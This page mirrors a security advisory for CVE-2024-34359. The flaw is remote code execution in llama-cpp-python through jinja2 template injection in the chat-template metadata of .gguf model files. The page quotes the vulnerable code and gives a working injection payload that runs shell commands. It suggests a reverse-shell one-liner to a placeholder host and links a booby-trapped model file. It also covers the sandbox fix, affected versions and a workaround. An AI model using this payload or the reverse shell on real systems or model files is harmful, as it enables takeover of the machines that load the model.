Ecosyste.ms: Advisories
An open API service providing security vulnerability metadata for many open source software ecosystems.
Security Advisories: GSA_kwCzR0hTQS01NnhnLXdmY2MtZzgyOc4AA74j
llama-cpp-python vulnerable to Remote Code Execution by Server-Side Template Injection in Model Metadata
Description
llama-cpp-python relies on the Llama class in llama.py to load .gguf llama.cpp models. The class's __init__ constructor takes several parameters that configure how the model is loaded and run. Besides NUMA, LoRA settings, tokenizer loading, and hardware settings, __init__ also reads the chat template from the targeted .gguf file's metadata and passes it to llama_chat_format.Jinja2ChatFormatter(...).to_chat_handler() to construct self.chat_handler for the model. However, Jinja2ChatFormatter compiles the chat template from the metadata with an unsandboxed jinja2.Environment, which is later rendered in __call__ to build the interaction prompt. This allows jinja2 Server-Side Template Injection, which leads to RCE via a carefully constructed payload.
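To see concretely what "unsandboxed" means here, the following minimal snippet (my own illustration, not taken from the advisory; the template string is a harmless stand-in for a real payload) shows that a plain jinja2.Environment happily evaluates attribute walks over Python internals:

import jinja2

# A harmless stand-in for an attacker-controlled chat template: it walks from a
# literal tuple up to object and enumerates its subclasses.
untrusted_template = "{{ ().__class__.__base__.__subclasses__() | length }} subclasses reachable"

env = jinja2.Environment(loader=jinja2.BaseLoader())
print(env.from_string(untrusted_template).render())
# Prints something like "2xx subclasses reachable" -- the expression was evaluated.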
Source-to-Sink
llama.py -> class Llama -> __init__:
class Llama:
    """High-level Python wrapper for a llama.cpp model."""

    __backend_initialized = False

    def __init__(
        self,
        model_path: str,
        # lots of params; Ignoring
    ):
        self.verbose = verbose
        set_verbose(verbose)

        if not Llama.__backend_initialized:
            with suppress_stdout_stderr(disable=verbose):
                llama_cpp.llama_backend_init()
            Llama.__backend_initialized = True

        # Ignoring lines of unrelated codes.....

        try:
            self.metadata = self._model.metadata()
        except Exception as e:
            self.metadata = {}
            if self.verbose:
                print(f"Failed to load metadata: {e}", file=sys.stderr)

        if self.verbose:
            print(f"Model metadata: {self.metadata}", file=sys.stderr)

        if (
            self.chat_format is None
            and self.chat_handler is None
            and "tokenizer.chat_template" in self.metadata
        ):
            chat_format = llama_chat_format.guess_chat_format_from_gguf_metadata(
                self.metadata
            )

            if chat_format is not None:
                self.chat_format = chat_format
                if self.verbose:
                    print(f"Guessed chat format: {chat_format}", file=sys.stderr)
            else:
                template = self.metadata["tokenizer.chat_template"]
                try:
                    eos_token_id = int(self.metadata["tokenizer.ggml.eos_token_id"])
                except:
                    eos_token_id = self.token_eos()
                try:
                    bos_token_id = int(self.metadata["tokenizer.ggml.bos_token_id"])
                except:
                    bos_token_id = self.token_bos()

                eos_token = self._model.token_get_text(eos_token_id)
                bos_token = self._model.token_get_text(bos_token_id)

                if self.verbose:
                    print(f"Using gguf chat template: {template}", file=sys.stderr)
                    print(f"Using chat eos_token: {eos_token}", file=sys.stderr)
                    print(f"Using chat bos_token: {bos_token}", file=sys.stderr)

                self.chat_handler = llama_chat_format.Jinja2ChatFormatter(
                    template=template,
                    eos_token=eos_token,
                    bos_token=bos_token,
                    stop_token_ids=[eos_token_id],
                ).to_chat_handler()

        if self.chat_format is None and self.chat_handler is None:
            self.chat_format = "llama-2"
            if self.verbose:
                print(f"Using fallback chat format: {chat_format}", file=sys.stderr)
In llama.py, llama-cpp-python defines the fundamental class that handles model initialization (including NUMA, LoRA settings, tokenizer loading, and so on). Here we focus on the part that processes metadata: it first checks whether chat_format and chat_handler are None and whether the key tokenizer.chat_template exists in the metadata dictionary self.metadata. If the key exists, it tries to guess the chat format from the metadata; if the guess fails, it reads the value of chat_template directly from self.metadata. self.metadata is populated during class initialization by calling the model's metadata() method. The chat template is then passed as a parameter to llama_chat_format.Jinja2ChatFormatter, and the result of to_chat_handler() is stored as chat_handler.
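This means the vulnerable path can be exercised without a real .gguf file. The sketch below is my own illustration (assuming a vulnerable release <= 0.2.71 is installed; the metadata dict, the placeholder token strings, and the .prompt attribute on the returned response are my assumptions): it feeds a metadata-style template directly into Jinja2ChatFormatter, whose __call__ renders it the same way the chat handler does at chat time:

from llama_cpp import llama_chat_format

# A metadata-style dict with an attacker-controlled chat template (illustrative).
fake_metadata = {
    "tokenizer.chat_template": (
        "{{ ().__class__.__base__.__subclasses__() | length }} subclasses reachable"
    ),
}

formatter = llama_chat_format.Jinja2ChatFormatter(
    template=fake_metadata["tokenizer.chat_template"],
    eos_token="</s>",   # placeholder token strings
    bos_token="<s>",
    stop_token_ids=[2],
)

# __call__ renders the template; on a vulnerable version the expression is evaluated.
response = formatter(messages=[{"role": "user", "content": "hi"}])
print(response.prompt)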
llama_chat_format.py -> Jinja2ChatFormatter:
self._environment = jinja2.Environment( -> from_string(self.template) -> self._environment.render(
class ChatFormatter(Protocol):
    """Base Protocol for a chat formatter. A chat formatter is a function that
    takes a list of messages and returns a chat format response which can be used
    to generate a completion. The response can also include a stop token or list
    of stop tokens to use for the completion."""

    def __call__(
        self,
        *,
        messages: List[llama_types.ChatCompletionRequestMessage],
        **kwargs: Any,
    ) -> ChatFormatterResponse: ...


class Jinja2ChatFormatter(ChatFormatter):
    def __init__(
        self,
        template: str,
        eos_token: str,
        bos_token: str,
        add_generation_prompt: bool = True,
        stop_token_ids: Optional[List[int]] = None,
    ):
        """A chat formatter that uses jinja2 templates to format the prompt."""
        self.template = template
        self.eos_token = eos_token
        self.bos_token = bos_token
        self.add_generation_prompt = add_generation_prompt
        self.stop_token_ids = set(stop_token_ids) if stop_token_ids is not None else None

        self._environment = jinja2.Environment(
            loader=jinja2.BaseLoader(),
            trim_blocks=True,
            lstrip_blocks=True,
        ).from_string(self.template)

    def __call__(
        self,
        *,
        messages: List[llama_types.ChatCompletionRequestMessage],
        functions: Optional[List[llama_types.ChatCompletionFunction]] = None,
        function_call: Optional[llama_types.ChatCompletionRequestFunctionCall] = None,
        tools: Optional[List[llama_types.ChatCompletionTool]] = None,
        tool_choice: Optional[llama_types.ChatCompletionToolChoiceOption] = None,
        **kwargs: Any,
    ) -> ChatFormatterResponse:
        def raise_exception(message: str):
            raise ValueError(message)

        prompt = self._environment.render(
            messages=messages,
            eos_token=self.eos_token,
            bos_token=self.bos_token,
            raise_exception=raise_exception,
            add_generation_prompt=self.add_generation_prompt,
            functions=functions,
            function_call=function_call,
            tools=tools,
            tool_choice=tool_choice,
        )
As we can see in llama_chat_format.py -> Jinja2ChatFormatter, the constructor __init__ initializes the required members of the class. The important lines are these:

self._environment = jinja2.Environment(
    loader=jinja2.BaseLoader(),
    trim_blocks=True,
    lstrip_blocks=True,
).from_string(self.template)

Notably, llama_cpp_python loads self.template (self.template = template, i.e. the chat template taken from the metadata and passed in as a parameter) directly via jinja2.Environment(...).from_string() without any sandboxing, such as jinja2's protected ImmutableSandboxedEnvironment class. This is extremely unsafe, because an attacker can implicitly make llama_cpp_python load a malicious chat template that is later rendered in __call__, allowing RCE or Denial-of-Service: jinja2's renderer evaluates expressions embedded in the template much like eval(), and exposed methods can be reached by walking attributes such as __globals__ and __subclasses__ of practically any object.
def __call__(
    self,
    *,
    messages: List[llama_types.ChatCompletionRequestMessage],
    functions: Optional[List[llama_types.ChatCompletionFunction]] = None,
    function_call: Optional[llama_types.ChatCompletionRequestFunctionCall] = None,
    tools: Optional[List[llama_types.ChatCompletionTool]] = None,
    tool_choice: Optional[llama_types.ChatCompletionToolChoiceOption] = None,
    **kwargs: Any,
) -> ChatFormatterResponse:
    def raise_exception(message: str):
        raise ValueError(message)

    prompt = self._environment.render(  # rendered!
        messages=messages,
        eos_token=self.eos_token,
        bos_token=self.bos_token,
        raise_exception=raise_exception,
        add_generation_prompt=self.add_generation_prompt,
        functions=functions,
        function_call=function_call,
        tools=tools,
        tool_choice=tool_choice,
    )
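For comparison, rendering the same kind of expression through jinja2's sandbox fails instead of evaluating it. The upstream fix (see the commit referenced below) takes a sandboxing approach; the snippet here is only my own illustration of the idea, not the patch itself:

from jinja2.sandbox import ImmutableSandboxedEnvironment, SecurityError

malicious = "{{ ().__class__.__base__.__subclasses__() }}"

# The sandboxed environment blocks access to underscore attributes like __class__,
# so rendering raises SecurityError instead of handing out Python internals.
try:
    ImmutableSandboxedEnvironment().from_string(malicious).render()
except SecurityError as e:
    print("blocked by sandbox:", e)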
Exploiting
For exploitation, we first downloaded qwen1_5-0_5b-chat-q2_k.gguf from Qwen/Qwen1.5-0.5B-Chat-GGUF on Hugging Face as the base for the exploit. By opening the file in a hex-capable editor (in my case, the built-in hex editor of vscode), you can search for the key chat_template (read as template = self.metadata["tokenizer.chat_template"] in llama-cpp-python).
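The same spot can also be located with a few lines of plain Python instead of a hex editor (my own helper, not part of the original advisory):

# Locate the embedded chat template inside the .gguf file (illustrative helper).
path = "qwen1_5-0_5b-chat-q2_k.gguf"
with open(path, "rb") as f:
    data = f.read()

key = b"tokenizer.chat_template"
offset = data.find(key)
if offset == -1:
    print("key not found")
else:
    print(f"found {key!r} at offset {offset:#x}")
    # the jinja2 template text is stored right after the key
    print(data[offset:offset + 300])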
qwen1_5-0_5b-chat-q2_k.gguf uses the usual role+message chat template written in jinja2 syntax. We first overwrite the original chat_template with \x00 bytes and then insert our SSTI payload. The payload iterates over the subclasses of the base class of all Python classes: the expression ().__class__.__base__.__subclasses__() retrieves a list of all subclasses of the basic object class. For each subclass x we check whether "warning" is in x.__name__ (this matches warnings.catch_warnings); if so, we access its module via the _module attribute, reach Python's built-in functions through __builtins__, use the __import__ function to import the os module, and finally call os.popen to touch /tmp/retr0reg, i.e. create an empty file named retr0reg under /tmp/:
{% for x in ().__class__.__base__.__subclasses__() %}{% if "warning" in x.__name__ %}{{x()._module.__builtins__['__import__']('os').popen("touch /tmp/retr0reg")}}{%endif%}{% endfor %}
In a real-world exploitation scenario, touch /tmp/retr0reg can be replaced with arbitrary commands such as sh -i >& /dev/tcp/<HOST>/<PORT> 0>&1 to open a reverse shell to a specified host; here we use touch /tmp/retr0reg simply to demonstrate that the vulnerability is exploitable.
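For reference, the attribute walk the payload performs is roughly equivalent to the following plain Python (my own illustration of what jinja2 ends up evaluating, not code from the advisory):

# Rough plain-Python equivalent of the SSTI payload (illustrative only).
for x in ().__class__.__base__.__subclasses__():
    if "warning" in x.__name__:  # matches warnings.catch_warnings on CPython
        # _module is the warnings module; its __builtins__ exposes __import__
        x()._module.__builtins__["__import__"]("os").popen("touch /tmp/retr0reg")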
After these steps, we have a malicious model with the payload embedded in the chat_template of the metadata, which will be parsed and rendered along the chain llama.py:Llama.__init__ -> self.chat_handler -> llama_chat_format.py:Jinja2ChatFormatter.__init__ -> self._environment = jinja2.Environment(...) -> llama_chat_format.py:Jinja2ChatFormatter.__call__ -> self._environment.render(...).
(The uploaded malicious model file is at https://huggingface.co/Retr0REG/Whats-up-gguf)
from llama_cpp import Llama

# Loading locally:
model = Llama(model_path="qwen1_5-0_5b-chat-q2_k.gguf")
# Or loading from huggingface:
model = Llama.from_pretrained(
    repo_id="Retr0REG/Whats-up-gguf",
    filename="qwen1_5-0_5b-chat-q2_k.gguf",
    verbose=False
)

print(model.create_chat_completion(messages=[{"role": "user", "content": "what is the meaning of life?"}]))
Now, when the model is loaded (either via Llama.from_pretrained or via Llama directly) and a chat completion is requested, the malicious code in the chat_template of the metadata is triggered and executes arbitrary code.
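If upgrading is not immediately possible, the template-loading branch shown in __init__ above can be short-circuited by passing an explicit chat_format, since the embedded template is only compiled when both chat_format and chat_handler are None. A sketch of that workaround follows (the chosen format is a placeholder; upgrading to a fixed release remains the proper remediation):

# Workaround sketch for affected versions: pass an explicit chat_format so the
# "tokenizer.chat_template" branch in Llama.__init__ is never taken and the
# embedded jinja2 template is never compiled. Upgrading to >= 0.2.72 is the real fix.
from llama_cpp import Llama

model = Llama(
    model_path="qwen1_5-0_5b-chat-q2_k.gguf",
    chat_format="chatml",  # placeholder; choose the format the model actually expects
)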
PoC video here: https://drive.google.com/file/d/1uLiU-uidESCs_4EqXDiyKR1eNOF1IUtb/view?usp=sharing
Permalink: https://github.com/advisories/GHSA-56xg-wfcc-g829
JSON: https://advisories.ecosyste.ms/api/v1/advisories/GSA_kwCzR0hTQS01NnhnLXdmY2MtZzgyOc4AA74j
Source: GitHub Advisory Database
Origin: Unspecified
Severity: Critical
Classification: General
Published: 7 months ago
Updated: 6 months ago
CVSS Score: 9.7
CVSS vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:H/I:H/A:H
Identifiers: GHSA-56xg-wfcc-g829, CVE-2024-34359
References:
- https://github.com/abetlen/llama-cpp-python/security/advisories/GHSA-56xg-wfcc-g829
- https://nvd.nist.gov/vuln/detail/CVE-2024-34359
- https://github.com/abetlen/llama-cpp-python/commit/b454f40a9a1787b2b5659cd2cb00819d983185df
- https://github.com/advisories/GHSA-56xg-wfcc-g829
Blast Radius: 31.3
Affected Packages
pypi:llama-cpp-python
Dependent packages: 136
Dependent repositories: 1,685
Downloads: 227,418 last month
Affected Version Ranges: >= 0.2.30, <= 0.2.71
Fixed in: 0.2.72
All affected versions: 0.2.30, 0.2.31, 0.2.32, 0.2.33, 0.2.34, 0.2.35, 0.2.36, 0.2.37, 0.2.38, 0.2.39, 0.2.40, 0.2.41, 0.2.42, 0.2.43, 0.2.44, 0.2.45, 0.2.46, 0.2.47, 0.2.48, 0.2.49, 0.2.50, 0.2.51, 0.2.52, 0.2.53, 0.2.54, 0.2.55, 0.2.56, 0.2.57, 0.2.58, 0.2.59, 0.2.60, 0.2.61, 0.2.62, 0.2.63, 0.2.64, 0.2.65, 0.2.66, 0.2.67, 0.2.68, 0.2.69, 0.2.70, 0.2.71
All unaffected versions: 0.1.1, 0.1.2, 0.1.3, 0.1.4, 0.1.5, 0.1.6, 0.1.7, 0.1.8, 0.1.9, 0.1.10, 0.1.11, 0.1.12, 0.1.13, 0.1.14, 0.1.15, 0.1.16, 0.1.17, 0.1.18, 0.1.19, 0.1.20, 0.1.21, 0.1.22, 0.1.23, 0.1.24, 0.1.25, 0.1.26, 0.1.27, 0.1.28, 0.1.29, 0.1.30, 0.1.31, 0.1.32, 0.1.33, 0.1.34, 0.1.35, 0.1.36, 0.1.37, 0.1.38, 0.1.39, 0.1.40, 0.1.41, 0.1.42, 0.1.43, 0.1.44, 0.1.45, 0.1.46, 0.1.47, 0.1.48, 0.1.49, 0.1.50, 0.1.51, 0.1.52, 0.1.53, 0.1.54, 0.1.55, 0.1.56, 0.1.57, 0.1.59, 0.1.61, 0.1.62, 0.1.63, 0.1.64, 0.1.65, 0.1.66, 0.1.67, 0.1.68, 0.1.69, 0.1.70, 0.1.71, 0.1.72, 0.1.73, 0.1.74, 0.1.76, 0.1.77, 0.1.78, 0.1.79, 0.1.80, 0.1.81, 0.1.82, 0.1.83, 0.1.84, 0.1.85, 0.2.0, 0.2.1, 0.2.2, 0.2.3, 0.2.4, 0.2.5, 0.2.6, 0.2.7, 0.2.8, 0.2.9, 0.2.10, 0.2.11, 0.2.12, 0.2.13, 0.2.14, 0.2.15, 0.2.16, 0.2.17, 0.2.18, 0.2.19, 0.2.20, 0.2.22, 0.2.23, 0.2.24, 0.2.25, 0.2.26, 0.2.27, 0.2.28, 0.2.29, 0.2.72, 0.2.73, 0.2.74, 0.2.75, 0.2.76, 0.2.77, 0.2.78, 0.2.79, 0.2.80, 0.2.81, 0.2.82, 0.2.83, 0.2.84, 0.2.85, 0.2.86, 0.2.87, 0.2.88, 0.2.89, 0.2.90, 0.3.0, 0.3.1, 0.3.2